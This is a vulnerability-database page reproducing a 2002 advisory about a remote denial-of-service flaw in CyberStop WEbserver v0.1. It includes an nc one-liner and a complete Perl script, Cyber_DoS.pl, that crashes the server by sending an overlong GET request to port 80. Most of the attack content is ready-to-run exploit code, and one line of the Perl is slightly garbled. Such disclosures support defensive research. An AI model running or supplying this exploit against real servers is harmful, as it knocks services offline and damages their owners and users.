PWNWIK.COM==免费、自由、人人可编辑的漏洞库
,
INFO
------oOo------ CyberStop WEbserver DoS Remote attacks. ------oOo------ CyberStop WEbserver for Windows 9x/NT/2000 contains remote vulnerabilities which allow users to attack remote services on the server. Exploit information included. Company Affected: www.cyberstop.com.sg Download: http://www.cyberstop.com.sg/webserver/webserver.zip Version: v0.1 Date Added: 12-DIC-01 Size: 2.84 MB OS Affected: Windows ALL. Author: ** Alex Hernandez <email protected> ** Thanks all the people from Spain and Argentina. ** Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins ** G.Maggiotti & H.Oliveira. ----=Brief Description=------------ Proof Of concept # uname -a SunOS Lab 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10 # # perl -e ' for ($i=1;$i<2049;$i++) { print "A";} ' | nc 10.0.0.1 80 # Exist a service named "Proyect1" and may be u can reading something like this on Windows Server: "Run-time error 40006": Wrong protocol or connection state for the request transaction or request. "Run-time error "5": Invalid procedure call or argument. Crash system and the admin need restart the service!. ------oOo------------------------------------ Vendor Response: The vendor was notified email protected http://www.cyberstop.com.sg Patch Temporary: No Data of vendor. Alex Hernandez <email protected> (c) 2002. ------oOo------------------------------------
Cyber_Dos.pl
#!/usr/bin/perl # Simple script to send a long 'A^s' command to the server, # resulting in the server crashing. # # CyberStop WEbserver v0.1 proof-of-concept exploit # By Alex Hernandez <email protected> (C)2002. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, # G.Maggiotti & H.Oliveira. # # # Usage: perl -x Cyber_DoS.pl -s <server> # # Example: # # perl -x Cyber_DoS.pl -s 10.0.0.1 # # Crash was successful ! # use Getopt::Std; use IO::Socket; print("\nCyberStop WEbserver v0.1 DoS exploit (c)2002.\n"); print("Alex Hernandez al3xhernandez\@ureach.com\n\n"); getopts('s:', \%args); if(!defined($args{s})){&usage;} ($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto); $def = "A"; $num = "3000"; $data .= $def x $num; $serv = $args{s}; $port = 80; $buf = "GET /$data /HTTP/1.0\r\n\r\n"; $in_addr = (gethostbyname($serv))4 || die("Error: $!\n"); $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!"); connect(S, $paddr) ||die ("Error: $!"); select(S); $| = 1; select(STDOUT); print S "$buf"; print("\nCrash was successful !\n\n"); sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");}
免费、自由、人人可编辑的漏洞库
